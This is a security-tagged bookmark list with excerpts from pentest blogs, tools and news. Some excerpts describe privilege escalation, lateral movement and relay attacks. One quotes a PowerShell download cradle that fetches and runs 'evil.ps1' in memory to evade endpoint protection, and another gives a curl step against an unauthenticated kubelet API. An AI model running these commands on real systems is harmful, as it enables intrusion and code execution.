recentpopularlog in

whip_lash : security   644

« earlier  
How a Bitcoin Evangelist Made Himself Vanish, in 15 (Not So Easy) Steps - The New York Times
Mr. Lopp viewed the exercise as something of an experiment, to find out the lengths he’d have to go to extricate himself from the databases and other repositories that hold our personal information and make it available to anyone willing to pay for it. That helps explain why he was willing to describe the steps he’s taken with me (though he did so from a burner phone, without disclosing his new location).
privacy  security  technology 
8 days ago by whip_lash
GitHub - stevenaldinger/decker: Declarative penetration testing orchestration framework
Decker is a penetration testing orchestration framework. It leverages HashiCorp Configuration Language 2 (the same config language as Terraform) to allow declarative penetration testing as code, so your tests can be versioned, shared, reused, and collaborated on with your team or the community.
pentest  devsecops  security  tools 
17 days ago by whip_lash
GitHub - imthenachoman/How-To-Secure-A-Linux-Server: An evolving how-to guide for securing a Linux server.
An evolving how-to guide for securing a Linux server that, hopefully, also teaches you a little about security and why it matters.
linux  server  sysadmin  hardening  security 
29 days ago by whip_lash
Tool Analysis Result Sheet
This site summarizes the results of examining logs recorded in Windows upon execution of the 49 tools which are likely to be used by the attacker that has infiltrated a network. The following logs were examined. Note that it was confirmed that traces of tool execution is most likely to be left in event logs. Accordingly, examination of event logs is the main focus here.
dfir  security  threathunting  tools  windows 
29 days ago by whip_lash
Presentations – Active Directory Security
This page includes the slides and videos (if available)
activedirectory  powershell  security 
6 weeks ago by whip_lash
Extended Protection for Authentication Overview | Microsoft Docs
The solution is to use a TLS-secured outer channel and a client-authenticated inner channel, and to pass a Channel Binding Token (CBT) to the server. The CBT is a property of the TLS-secured outer channel, and is used to bind the outer channel to a conversation over the client-authenticated inner channel.

In the previous scenario, the CBT of the client-attacker TLS channel is merged with the authorization information that is sent to the server. A CBT-aware server compares the CBT co...
security  microsoft  windows  authentication 
6 weeks ago by whip_lash
Abusing Exchange: One API call away from Domain Admin -
In most organisations using Active Directory and Exchange, Exchange servers have such high privileges that being an Administrator on an Exchange server is enough to escalate to Domain Admin. Recently I came across a blog from the ZDI, in which they detail a way to let Exchange authenticate to attackers using NTLM over HTTP. This can be combined with an NTLM relay attack to escalate from any user with a mailbox to Domain Admin in probably 90% of the organisations I’ve seen that use Ex...
exchange  windows  security  pentest  activedirectory 
6 weeks ago by whip_lash
Sh00T - A Testing Environment for Manual Security Testers - KitPloit - PenTest & Hacking Tools for your CyberSecurity Kit ☣
is a task manager to let you focus on performing security testing
provides To Do checklists of test cases
helps to create bug reports with customizable bug templates
pentest  security  tool  notes 
7 weeks ago by whip_lash
Linux Privilege Escalation – Using apt-get/apt/dpkg to abuse sudo “NOPASSWD” misconfiguration – Logan S Diomedi – lsdsecurity
There are many well known and documented attack vectors for the sudo command that exist. Please see my Useful Resources page for the Windows & Linux Privilege Escalation piece that contains a ton of helpful knowledge in this category. Today, we’re going to be using a very poorly documented feature in apt-get when a normal user is allowed to execute apt-get as a root user. Let’s dive in!
linux  privesc  privilegeescalation  sudo  pentest  security 
8 weeks ago by whip_lash
How to write a rootkit without really trying | Trail of Bits Blog
Fault injection finds bugs in places that fuzzing and conventional unit testing often won’t:

NULL dereferences caused by assuming that particular functions never fail (are you sure you always check whether getcwd(2) succeeds?) Are you sure that you’re doing better than systemd?
Memory corruption caused by unexpectedly small buffers, or disclosure caused by unexpectedly large buffers
Integer over/underflow caused by invalid or unexpected values (are you sure you’re not making incorrect assumptions about stat(2)‘s atime/mtime/ctime fields?)
linux  security  kernel  syscall 
9 weeks ago by whip_lash
Kubernetes: unauth kublet API 10250 token theft & kubectl Carnal0wnage - Attack Research Blog Carnal0wnage & Attack Research Blog
do a curl -s https://k8-node:10250/runningpods/ to get a list of running pods

With that data, you can craft your post request to exec within a pod so we can poke around.
kubernetes  pentest  security  vulnerability 
9 weeks ago by whip_lash
Kubernetes: unauth kublet API 10250 basic code exec Carnal0wnage - Attack Research Blog Carnal0wnage & Attack Research Blog
Unauth API access (10250)

Most Kubernetes deployments provide authentication for this port. But it’s still possible to expose it inadvertently and it's still pretty common to find it exposed via the "insecure API service" option.

Everybody who has access to the service kubelet port (10250), even without a certificate, can execute any command inside the container.
kubernetes  security  pentest  vulnerability 
9 weeks ago by whip_lash
Attacking Kubernetes through Kubelet
Favorite tweet:

Attacking Kubernetes through Kubelet :

— Binni Shah (@binitamshah) January 14, 2019
kubernetes  pentest  vulnerability  security 
9 weeks ago by whip_lash
Powershell Script for Enumerating Vulnerable DCOM Applications: DCOMrade
   DCOMrade is a Powershell script that is able to enumerate the possible vulnerable DCOM applications that might allow for lateral movement, code execution, data exfiltration, etc. The script is build to work with Powershell 2.0 but will work with all versions above as well.
dcom  windows  pentest  powershell  postexploitation  security 
10 weeks ago by whip_lash
Lateral Movement via DCOM: Round 2 | enigma0x3
This resulted in identifying the MMC20.Application COM object and its “ExecuteShellCommand” method, which you can read more about here. Thanks to the help of James Forshaw (@tiraniddo), we determined that the MMC20.Application object lacked explicit “LaunchPermissions”, resulting in the default permission set allowing Administrators access:
dcom  security  windows  postexploitation  pentest 
10 weeks ago by whip_lash
SlavaSoft HashCalc - Hash, CRC, and HMAC Calculator
A fast and easy-to-use calculator that allows to compute message digests, checksums and HMACs for files, as well as for text and hex strings. It offers a choice of 13 of the most popular hash and checksum algorithms for calculations.
hash  hashes  security 
10 weeks ago by whip_lash
Veritas® Traveller's Doorstop - Lee Valley Tools
To use it, you just slide the wedge under the door and elevate it with the screw until the door is solidly wedged. Anyone attempting entry causes the door to wedge tighter in the frame while the pointed screw keeps the wedge from shifting. The screw can be used with concrete subfloors as well as the traditional carpet-covered subfloors.
physical  security  travel 
10 weeks ago by whip_lash
Glibc Heap Exploitation Basics : Introduction to ptmalloc2 internals (Part 1)
In this post and the others in this series, I will unpack some of the internals to glibc's dynamic heap data structures and associated beasts. This post specifically will start you off with no background insight on the heap (perhaps a little on ELF internals and debugging), and detail some experiments you can perform to learn how the heap works.
exploits  security  heap  memory 
11 weeks ago by whip_lash
Fuzzing Like It’s 1989 | Trail of Bits Blog
Fuzzing has been a simple and reliable way to find bugs in programs for the last 30 years. While fuzzing research is advancing rapidly, even the simplest attempts that reuse 30-year-old code are successful at identifying bugs in modern Linux utilities.

The original fuzzing papers do a great job at foretelling the dangers of C and the security issues it would cause for decades. They argue convincingly that C makes it too easy to write unsafe code and should be avoided if possible. More directly, the papers show that even naive fuzz testing still exposes bugs, and such testing should be incorporated as a standard software development practice. Sadly, this advice was not followed for decades.
c  fuzzing  security 
11 weeks ago by whip_lash
learn-json-web-tokens/ at master · dwyl/learn-json-web-tokens · GitHub
JSON Web Tokens (JWTs) make it easy to send read-only signed "claims" between services (both internal and external to your app/site). Claims are any bits of data that you want someone else to be able to read and/or verify but not alter.
authentication  security  webdev  webapp  jwt  json 
11 weeks ago by whip_lash
The Ultimate PHP Security Checklist - DZone Security
This security checklist aims to give developers a list of PHP security best practices they can follow to help improve the security of their code.
php  webapp  security 
11 weeks ago by whip_lash
NTAPI Undocumented Functions
This is an advanced, low-level programer's guide to Windows NT Kernel, Native API and drivers.
All remarks, fixes and comments are very welcome.
api  kernel  programming  security  windows 
11 weeks ago by whip_lash
flAWS 2 has two paths this time: Attacker and Defender! In the Attacker path, you'll exploit your way through misconfigurations in serverless (Lambda) and containers (ECS Fargate). In the Defender path, that target is now viewed as the victim and you'll work as an incident responder for that same app, understanding how an attack happened. You'll get access to logs of a previous successful attack. As a Defender you'll learn the power of jq in analyzing logs, and instructions on how to set up Athena in your own environment.
aws  security  pentest  pentesting  ctf  tutorial 
11 weeks ago by whip_lash
GitHub - pentesteracademy/patoolkit: PA Toolkit is a collection of traffic analysis plugins focused on security
PA Toolkit contains plugins (both dissectors and taps) covering various scenarios for multiple protocols, including:

WiFi (WiFi network summary, Detecting beacon, deauth floods etc.)
HTTP (Listing all visited websites, downloaded files)
HTTPS (Listing all websites opened on HTTPS)
ARP (MAC-IP table, Detect MAC spoofing and ARP poisoning)
DNS (Listing DNS servers used and DNS resolution, Detecting DNS Tunnels)
The project is under active development and more plugins will be added in near future.
analysis  http  network  pentesting  https  wireshark  pcap  security 
12 weeks ago by whip_lash
Hexacorn | Blog
The latest EDR sheet can be found here.
dfir  reference  security  edr  antivirus 
december 2018 by whip_lash
GitHub - trimstray/the-book-of-secret-knowledge: A collection of awesome lists, manuals, blogs, hacks, one-liners, cli/web tools and more. Especially for System and Network Administrators, DevOps, Pentesters or Security Researchers.
A collection of awesome lists, manuals, blogs, hacks, one-liners, cli/web tools and more. Especially for System and Network Administrators, DevOps, Pentesters or Security Researchers.
github  linux  security  software  tools 
december 2018 by whip_lash
From blind XXE to root-level file read access | Honoki
Below, I will outline the thought process that helped me make sense of what I encountered, and that in the end allowed me to elevate what seemed to be a medium-criticality vulnerability into a critical finding.

I will put deliberate emphasis on the various error messages that I encountered in the hope that it can point others in the right direction in the future.
java  security  xxe  pentest 
december 2018 by whip_lash
Red XOR Blue: SharpCradle - Loading remote C# binaries and executing them in memory
SharpCradle isn't exactly the same as our traditional powershell download cradle ( IEX (New-Object Net.Webclient).downloadstring("http://IP/evil.ps1") ) but the concept, at least to me, is the same.  We are simply reaching out from our victim's machine to somewhere remotely and retrieving our evil code and executing it in memory.  This helps in bypassing endpoint protections by making it harder to detect what exactly we are up to.  In fact, I have used this on a wide variety of client engagements and it has yet to get flagged, though I am sure that will eventually change as defenses are getting better every day.
c#  pentest  security 
december 2018 by whip_lash
A Collection of Resources for Getting Started in ICS/SCADA Cybersecurity – Robert M. Lee
I commonly get asked by folks what approach they should take to get started in industrial control system (ICS) cybersecurity. Sometimes these individuals have backgrounds in control systems, sometimes they have backgrounds in security, and sometimes they are completely new to both.
ics  security  pentest 
december 2018 by whip_lash
Security Education Companion
Welcome to the Security Education Companion! SEC is a resource for people teaching digital security to their friends and neighbors.
security  education 
december 2018 by whip_lash
GitHub - Voorivex/pentest-guide: Penetration tests cases, resources and guidelines.
This guid is for the penetration testers seeking for the appropriate test cases required during a penetration test project. I rearranged the OWASP Testing Guide v4 from my point of view including 9 Test Classes and each class has several Test Cases to conduct against the target. Each Test Case covers several OWASP tests which also is useful for the report document. I've also added 10 extra Tests Cases marked by the EXTRA-TEST. I hope it will be useful in both penetration test projects and bug-bounty.
pentest  security  owasp  webapp 
november 2018 by whip_lash
SANS Institute: Reading Room - Cloud Computing
Companies using AWS (Amazon Web Services) will find that traditional means of full packet capture using span ports is not possible. As defined in the AWS Service Level Agreement, Amazon runs certain aspects of the cloud platform and does not give customers access to physical networking hardware. Although access to physical network equipment is limited, packet capture is still possible on AWS but needs to be architected in a different way.
aws  networking  security 
november 2018 by whip_lash
How Netflix gives all its engineers SSH access - O'Reilly Media
Russell Lewis outlines Netflix’s SSH bastion architecture, which allows them to audit and automatically alert after the fact rather than slowing down engineers before granting access.
ssh  security  devops  video 
october 2018 by whip_lash
Errata Security: TCP/IP, Sockets, and SIGPIPE
There is a spectre haunting the Internet -- the spectre of SIGPIPE errors. It's a bug in the original design of Unix networking from 1981 that is perpetuated by college textbooks, which teach students to ignore it. As a consequence, sometimes software unexpectedly crashes. This is particularly acute on industrial and medical networks, where security professionals can't run port/security scans for fear of crashing critical devices.
programming  network  unix  security  sigpipe  tcp 
october 2018 by whip_lash
Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM
NTLM relay from the local “NT AUTHORITY\SYSTEM” (we will just call it SYSTEM for brevity) account back to some other system service has been the theme for the Potato privilege escalation exploits. The first step is to trick the SYSTEM account into performing authentication to some TCP listener we control.

In the original Hot Potato exploit, we did some complex magic with NBNS spoofing, WPAD, and Windows Update services to trick it into authenticating to us over HTTP. For more information, see the original blog post.

Today, we’ll be discussing another method to accomplish the same end goal which James Forshaw discussed here. We’ll basically be tricking DCOM/RPC into NTLM authenticating to us. The advantage of this more complex method is that it is 100% reliable, consistent across Windows versions, and fires instantly rather than sometimes having to wait for Windows Update.
security  pentest  windows  privesc  privilegeescalation 
september 2018 by whip_lash
Juicy Potato (abusing the golden privileges) | juicy-potato
If the user has SeImpersonate or SeAssignPrimaryToken privileges then you are SYSTEM.

It’s nearly impossible to prevent the abuse of all these COM Servers. You could think to modify the permissions of these objects via DCOMCNFG but good luck, this is gonna be challenging.

The actual solution is to protect sensitive accounts and applications which run under the * SERVICE accounts. Stopping DCOM would certainly inhibit this exploit but could have a serious impact on the underlying OS.
pentest  windows  privilegeescalation  security 
september 2018 by whip_lash
From Kekeo to Rubeus – Posts By SpecterOps Team Members
Today I’m releasing Rubeus, the start of a C# reimplementation of some (not all) of Kekeo’s functionality. I’ve wanted to dive deeper into Kerberos structures and exchanges for a while in order to better understand the entire system, and this project provided the perfect excuse to jump right in.
kerberos  activedirectory  security  pentest  tool 
september 2018 by whip_lash
FuzzySecurity | Windows Userland Persistence Fundamentals
This tutorial will cover several techniques that can be used to gain persistent access to Windows machines. Usually this doesn't enter into play during a pentest (with the exception of red team engagements) as there is no benefit to adding it to the scope of the project. That is not to say it is not an interesting subject, both from a defensive and offensive perspective.
persistence  windows  pentest  redteam  security 
september 2018 by whip_lash
The pitfalls of using ssh-agent, or how to use an agent safely
I probably sound like a broken record by now, but something like ssh-ident allows you to keep different keys in different agents, easily, while loading agents and keys on demand, keep your identities separated, and easily set a timeout while reloading all keys as necessary.
linux  security  ssh 
september 2018 by whip_lash
Script Get All AD Users Logon History with their Logged on Computers (with IPs)& OUs
This script will list the AD users logon information with their logged on computers by inspecting the Kerberos TGT Request
Events(EventID 4768) from domain controllers. Not Only User account Name is fetched, but also users OU path and Computer
Accounts are retrieved. You can also list the history of last logged on users. In Environment where Exchange Servers are
used, the exchange servers authentication request for users will also be logged since it also uses EventID (4768) to for
TGT Request. You can also export the result to CSV file format. Powershell version 3.0 is needed to use the script.
You can Define the following parameters to suite your need:
ad  security  powershell  Scripting 
september 2018 by whip_lash
AnonOpsecPrivacy - InfoSec Reference
Colossal InfoSec reference on every subject imaginable
security  pentest 
august 2018 by whip_lash
Rotten Potato | Penetration Testing Lab
However there is a technique which can be used that tries to trick the “NT Authority\System” account to negotiate and authenticate via NTLM locally so the token for the “NT Authority\System” account would become available and therefore privilege escalation possible. This technique is called Rotten Potato and it was introduced in DerbyCon 2016 by Stephen Breen and Chris Mallz.
windows  privesc  privilegeescalation  pentest  security 
august 2018 by whip_lash
GitHub - quentinhardy/odat: ODAT: Oracle Database Attacking Tool
ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely.
oracle  database  pentest  security  tool 
august 2018 by whip_lash
NSA Cracked Open Encrypted Networks of Russian Airlines, Al Jazeera, and Other “High Potential” Targets
The NSA’s ability to crack into sensitive VPNs belonging to large organizations, all the way back in 2006, raises broader questions about the security of such networks. Many consumers pay for access to VPNs in order to mask the origin of their internet traffic from the sites they visit, hide their surfing habits from their internet service providers, and to protect against eavesdroppers on public Wi-Fi networks.
security  nsa  vpn 
august 2018 by whip_lash
Veritas® Traveller's Doorstop - Lee Valley Tools
To use it, you just slide the wedge under the door and elevate it with the screw until the door is solidly wedged. Anyone attempting entry causes the door to wedge tighter in the frame while the pointed screw keeps the wedge from shifting. The screw can be used with concrete subfloors as well as the traditional carpet-covered subfloors.

It does not damage carpeting unless there is an attempted forced entry; it then penetrates the subfloor as the pressure on the wedge increases. But then, which would you prefer, a dent in the subfloor or an unwanted visitor? The lever handle gives you substantial mechanical advantage, making it easy to turn the screw.
security  travel 
august 2018 by whip_lash
michenriksen/gitrob: Reconnaissance tool for GitHub organizations
Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
git  github  osint  security 
august 2018 by whip_lash
« earlier      
per page:    204080120160

Copy this bookmark:

to read